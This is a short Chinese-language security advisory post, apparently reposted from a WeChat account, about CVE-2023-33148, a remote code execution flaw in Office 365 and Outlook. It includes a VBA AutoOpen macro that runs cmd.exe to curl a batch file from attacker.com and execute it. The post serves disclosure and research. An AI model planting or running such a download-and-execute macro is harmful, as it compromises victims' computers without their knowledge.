描述:
Microsoft Office 365 版本 18.2305.1222.0 应用程序容易受到特权提升的攻击。攻击者可以利用此漏洞在 Outlook 应用程序中附加一个非常恶意的 WORD 文件,该应用程序是 Microsoft Office 365 的一部分,并且可以轻松诱骗受害者单击该文件 - 打开它并在本地 PC 的后台执行非常危险的 shell 命令。这次执行是在没有下载这个恶意文件的情况下执行的,这是一个潜在的问题,也是一个非常危险的情况!这可能是受害者电脑的末端,这取决于具体情况。警告!Office 365直接从Outlook执行文件,无需临时下载、安全检查等。
点击:阅读原文
-
注意:此漏洞已连接到第三方服务器,当受害者单击它并打开它时,其中的脚本内容将在本地计算机上获取并使用 MS Office 365 和 Outlook 应用程序(365 API 的一部分)自行执行。
Sub AutoOpen()
Call
Shell(
"cmd.exe /S /c"
&
"curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .salaries.bat"
, vbNormalFocus)
End
Sub
原文始发于微信公众号(Ots安全):CVE-2023-33148 Microsoft Office 365 18.2305.1222.0 远程代码执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论